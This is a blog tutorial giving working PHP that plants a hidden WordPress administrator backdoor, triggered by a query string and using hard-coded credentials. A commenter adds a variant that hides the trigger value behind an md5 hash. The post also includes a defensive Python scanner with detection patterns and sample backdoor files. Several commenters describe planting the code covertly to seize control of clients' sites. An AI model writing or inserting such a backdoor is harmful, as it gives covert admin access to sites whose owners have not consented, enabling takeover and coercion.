How To: Create Backdoor Admin Access in WordPress

Have you ever wanted an easy back door that auto-creates an administrator account in WordPress? The code snippet below does just that. Simply place the code in your theme's functions.php file and upload it to your web server:

<?php
// Runs on every front-end page load where the theme calls wp_head().
add_action('wp_head', 'my_backdoor');

function my_backdoor() {
	// Trigger: ?backdoor=go in the query string. isset() avoids a PHP notice on every other request.
	if (isset($_GET['backdoor']) && $_GET['backdoor'] === 'go') {
		// wp_create_user() lives in wp-includes/user.php, which WordPress loads on every request,
		// so the old require of wp-includes/registration.php (deprecated since 3.1) is unnecessary.
		if (!username_exists('brad')) {
			$user_id = wp_create_user('brad', 'pa55w0rd');
			// wp_create_user() returns a WP_Error on failure; don't hand that to WP_User.
			if (!is_wp_error($user_id)) {
				$user = new WP_User($user_id);
				$user->set_role('administrator');
			}
		}
	}
}
// No closing ?> tag: whitespace after it would cause "headers already sent" errors.

To activate this code, simply visit http://example.com?backdoor=go (any page that renders the theme header will do, since the hook fires wherever the theme calls wp_head()).

When triggered, the code creates a new administrator account with the username brad and the password pa55w0rd. The function first checks that the user account doesn't already exist before creating it.

Keep in mind that this code is a security risk: anyone who knows (or guesses) the query string can trigger it, and because the username and password are hard-coded, anyone who can read the theme files, including everyone you distribute the theme to, can log in as an administrator. The account it creates is an ordinary user in the database, so deleting it from the Users screen does not help for long: the next visit to ?backdoor=go recreates it until the code itself is removed from functions.php. Also, don't be evil; only use this code for good!
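Because a theme or plugin can ship this snippet to every site that installs it, the useful check from the defender's side is to look for the pattern rather than for the literal code. The Python script below is an added example (not code from this post or from WordPress) that triages theme and plugin PHP for it: a hooked callback that reads $_GET/$_REQUEST and then calls wp_create_user() or grants the administrator role, the variant that compares an md5 of the trigger value (a commenter proposes that below), and eval() of an encoded payload, which the comments also warn about. The function and class names (scan_php, function_bodies, scan_tree, Finding) and the four sample files are my own constructions.

```python
"""Triage scanner for query-string-triggered admin backdoors in WordPress theme/plugin
PHP. Added example, not code from the post or from WordPress; samples are constructed."""
import re
import sys
from dataclasses import dataclass
from pathlib import Path

# Loose on whitespace and quote style so a reformatted copy is still caught.
HOOK_RE = re.compile(r"add_action\s*\(\s*['\"](\w+)['\"]\s*,\s*['\"](\w+)['\"]", re.I)
FUNC_RE = re.compile(r"\bfunction\s+(\w+)\s*\(", re.I)
INPUT_RE = re.compile(r"\$_(?:GET|REQUEST)\s*\[", re.I)
HASHED_TRIGGER_RE = re.compile(r"\b(?:md5|sha1|hash|crc32)\s*\(\s*\$_(?:GET|REQUEST)", re.I)
CREATE_RE = re.compile(r"\bwp_(?:create|insert)_user\s*\(", re.I)
ADMIN_ROLE_RE = re.compile(r"\b(?:set_role|add_role)\s*\(\s*['\"]administrator['\"]", re.I)
OBFUSC_RE = re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)

@dataclass
class Finding:
    path: str
    hook: str        # action the callback is attached to, or "(not hooked)"
    callback: str
    reasons: list

def function_bodies(src):
    """Map function name -> body by counting braces from the opening '{'.
    Braces inside string literals are not skipped; good enough for triage."""
    bodies = {}
    for m in FUNC_RE.finditer(src):
        start = src.find("{", m.end())
        if start < 0:
            continue
        depth = 0
        for i in range(start, len(src)):
            if src[i] == "{":
                depth += 1
            elif src[i] == "}":
                depth -= 1
                if depth == 0:
                    bodies[m.group(1)] = src[start:i + 1]
                    break
    return bodies

def scan_php(path, src):
    """Findings for one PHP source. A function is reported only when a request parameter
    gates a user creation or admin-role grant; a nonce-checked $_POST sign-up form is left alone."""
    findings = []
    hooks = {cb: hook for hook, cb in HOOK_RE.findall(src)}
    for name, body in function_bodies(src).items():
        creates, grants = bool(CREATE_RE.search(body)), bool(ADMIN_ROLE_RE.search(body))
        if not (INPUT_RE.search(body) and (creates or grants)):
            continue
        reasons = ["reads $_GET/$_REQUEST"]
        if HASHED_TRIGGER_RE.search(body):
            reasons.append("compares a hash of the parameter (hidden trigger value)")
        if creates:
            reasons.append("calls wp_create_user()/wp_insert_user()")
        if grants:
            reasons.append("grants the administrator role")
        findings.append(Finding(path, hooks.get(name, "(not hooked)"), name, reasons))
    if OBFUSC_RE.search(src):
        findings.append(Finding(path, "-", "-", ["eval() of an encoded payload; decode and inspect by hand"]))
    return findings

def scan_tree(root):
    """Scan every .php file under root, e.g. wp-content/themes."""
    return [f for p in Path(root).rglob("*.php") for f in scan_php(str(p), p.read_text(errors="replace"))]

# Constructed sample inputs for the demo, not files from any real theme.
SAMPLE_BACKDOOR = r"""<?php
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    if ($_GET['backdoor'] == 'go' && !username_exists('brad')) {
        $user = new WP_User(wp_create_user('brad', 'pa55w0rd'));
        $user->set_role('administrator');
    }
}"""
SAMPLE_HASHED = r"""<?php
add_action("init", "support_login");
function support_login() {
    if (md5($_GET["backdoor"]) == $expected_hash) {  // trigger word not in source
        (new WP_User(wp_create_user("support", "pa55w0rd")))->set_role("administrator");
    }
}"""
SAMPLE_BENIGN = r"""<?php
add_action('init', 'signup_handler');
function signup_handler() {
    if (isset($_POST['nonce']) && wp_verify_nonce($_POST['nonce'], 'signup')) {
        wp_create_user(sanitize_user($_POST['user']), wp_generate_password());
    }
}"""
SAMPLE_OBFUSCATED = r"""<?php
add_action('wp_footer', 'footer_extras');
function footer_extras() { eval(base64_decode('<encoded payload>')); }"""

if __name__ == "__main__":
    samples = [("backdoor.php", SAMPLE_BACKDOOR), ("hashed.php", SAMPLE_HASHED),
               ("benign.php", SAMPLE_BENIGN), ("obfuscated.php", SAMPLE_OBFUSCATED)]
    found = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else [f for n, s in samples for f in scan_php(n, s)]
    for f in found:
        print(f"{f.path}: {f.callback} on {f.hook}: {'; '.join(f.reasons)}")
```

Run it with a wp-content path to walk real files, or with no argument to see it flag the two backdoor samples and the eval() sample while leaving the nonce-checked sign-up form alone. It is a triage tool: a hit means read the function by hand, and a miss proves nothing about a callback registered as a closure or an array callable, which this simple hook regex does not follow.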

Enjoy this post? Be sure to subscribe to my RSS feed and my WordPress Tips and Tricks Newsletter! Also check out my WordPress books: Professional WordPress Second Edition & Professional WordPress Plugin Development

Comments

  1. What you’re presenting here is way not fair.

  2. Not fair in what way Daniel?

  3. Obviously, because someone may use it to hack into other people’s blogs.

  4. To set this code up you would need FTP access to a site. So technically you can’t really hack a site with this code, but I see where you are coming from. That’s why I said don’t be evil.

  5. @Daniel: If someone has enough access to a blog to be able to implement this code, then this should be the least of your worries.

    • I second that, ROFL. If someone has enough access to get to your FTP or anything else on your server, then adding this “backdoor” is the LEAST of your worries.

  6. Brad (or anyone), can you give a practical example of how setting up a backdoor like this could be used legitimately? To be honest, I can’t think of anything good coming out of it.

  7. It’s interesting.

    I’m not a WP expert, but if a WordPress theme creator (such as Leland) inserted this code into a theme’s functions.php file… couldn’t he gain access to any blog using the user/pass defined in that code?

    Just wondering, as I said, I’m not WP expert.

  8. Keith,

    Yeah – they could.

    I’m using similar code via a plugin for clients. The plugin sits in the admin sidebar and acts, mostly, as a contact form. It sits there in case a client needs help with something. When they do, they click on the link in the sidebar and fill in the form to “call” us.

    If there isn’t already a dedicated user for us, a button is also on that page with a reminder that it’s best to have us work under our own username, and that they can click the button to generate one for us.

  9. “but I see where you are coming from. That’s why I said don’t be evil”

    Prejudices, Brad? :)

    As stated above, it may be very easy for theme creators to insert such code into themes. It can also be encoded and inserted somewhere randomly as just a line of text. Most users are illiterate, so chances are they won’t even suspect it.

  10. @Leland: You have FTP access to a client’s blog but are unable to access their administration area (forgotten password and unknown e-mail address) or MySQL. The times you’d need this are rather slim though.

    Regardless, it’s not like Brad just invented something new here. This is one of the least detrimental things one could do to your blog if they wanted to. A theme is like a plugin — I could use a theme to spam other blogs, give me access to the files on your server, etc. etc. etc.

  11. @Viper007Bond: Yeah, true. Thanks for the response. I guess it can come in handy for when you just have FTP access and no other way to login.

    Also thanks Tommy for the response, that sounds like an interesting application as well.

  12. Nice to see this code snippet got some conversations going! There are definitely many different uses for this code, some good and some bad. Any theme or plugin could contain malicious code, so it’s always a good idea to review the code of any theme or plugin you plan on using if it’s not from a trusted source.

  13. I can see the good and the bad in this. Let’s say you are creating a design for a client, one you know will need support in the future. By adding this to your functions, you will always be able to have a login to access the account, even if they delete yours and forget how to add a new one.

    The one note here is that it is the intention of the programmer that really matters. Sure, you can add this as a backdoor hack to manipulate WordPress blogs. And let’s face it, those with bad intentions most likely already know how to do this.

    So for those of you who are arguing that this is bad, at least the average user can see how it is implemented and can look at the functions of a theme they are thinking of using for any suspicious code.

    And for those claiming that you can encode this, that is yet another warning for the average user. If you look in the functions.php file and see a set of random characters, beware. This is encoded data that may do a number of things. I have seen code like this automatically add “spammy” links, and more. And yes, some of the themes with this sort of code are actually found at WordPress.org! (or at least were last time I looked)

    Bottom line, if you use this code in your theme, you should disclose to the end user why it is there so they can decide for themselves. If as a user, you aren’t sure about a theme, don’t use it. If you see a random line of characters, know that something is encoded and beware.

  14. Tuomas Leppänen says:

    Hmm, tbh I’m using this code with clients that have not paid for work I have done, to protect it in case they refuse to pay and change passwords. I can easily log in and disable the blog until they pay.

  15. A change I would encourage to this code… to prevent any hacker in the world from using this as a backdoor, instead of adding your password in the code, have WordPress create a password for you. Sure, you won’t know what it is, but if you are the only one with access to the email in the code, then you can use the password reset option in WordPress to gain access. This just makes the backdoor more secure for the client, but still accessible for the support.

  16. This is an older post, but I felt I needed to give a practical example of why I use this. I’ve been developing WordPress websites for many years, and on rare yet unfortunate occasions the client doesn’t pay the remaining balance of their project. One client in particular decided to change all the FTP and WordPress passwords to lock me out. Basically, in my policy agreement I state that if a client is a non-payer, the site gets an “under construction” page thrown up until they either pay up or work something out with me. Again, this is something they’ve legally signed. Being locked out of FTP, their hosting CP and WordPress, I wasn’t able to do this and I never received my final payment from the client. Moving forward, I implement this code as a safety net and I make mention of this in my policy agreements.

    • Well and good, but since they know about the code in that case they’ll just remove it and you’re still locked out.

  17. Does it run on WordPress higher than 3?

  18. I had my website built by designers and now want to modify it myself by creating my own administration account with this code. I “created” one, but now after it logs in it says “error 500, internal server error”. If I go to my website, the line at the top shows up with my username, but if I click on any links there they all become internal errors. How do I get around that?

  19. Nice way to make sure that your WordPress work is paid!

  20. Yeah guys, you’re not really supposed to be a webmaster if you don’t have a computer science degree. If you don’t and then complain that you’re scared because you don’t know stuff, well we don’t give a shit.

  21. Thanks, it’s really helpful code.

    I reset my blog admin password without editing MySQL.

    Thanks a lot… It really helped me.

  22. A very simple solution to make this a lot more secure is to use md5 to encode the GET parameter and then compare it with the already encoded md5 string. In this way it’s really hard to guess the parameter name, also by reading the code.

    • Riccardo,

      could you give detailed instructions on how to md5 encode the GET parameter? Shall I use an MD5 encoder and just paste the encoded password?

      • Hi Petra,

        Here is an example:



        This is just using go converted to md5, so the attacker will have a hard time trying to guess the value of the GET.

        If you have any questions just let me know.

        • I hope the code is fine now:

          add_action('wp_head', 'my_backdoor');

          function my_backdoor() {
              // '34d1f9...' is md5('go') according to the commenter; only the hash appears in the source.
              // hash_equals() (PHP 5.6+) compares in constant time and avoids PHP's loose == on strings.
              if (isset($_GET['backdoor']) && hash_equals('34d1f91fb2e514b8576fab1a75a89a6b', md5($_GET['backdoor']))) {
                  // wp_create_user() is always loaded from wp-includes/user.php; no require needed.
                  if (!username_exists('brad')) {
                      $user_id = wp_create_user('brad', 'pa55w0rd');
                      if (!is_wp_error($user_id)) {
                          $user = new WP_User($user_id);
                          $user->set_role('administrator');
                      }
                  }
              }
          }

  23. How would you do a delete function? What would work like this: http://example.com?backdoor_delete=go

  24. Thank you!

    I was using different methods, but this one is the easiest ever.

    I use things like this when I create websites for clients and then suddenly, when you send them the invoice, they remove my FTP access and admin access as well. This is very nice! I am not saying all of the clients, but out of 10 clients, 7 won’t pay, heh.

    - You should maybe remove this information (it is very handy, but should be kept away for security reasons). All the best and one more massive thank you, buddy.

  25. I think this is very useful to use for clients that have bad intentions not to pay.
    Believe me, I have been ripped off a couple of times, so I’m very happy that you took the effort to make this.

    Thank you very much.

  26. How do you delete the new user if you have no access to other admin accounts?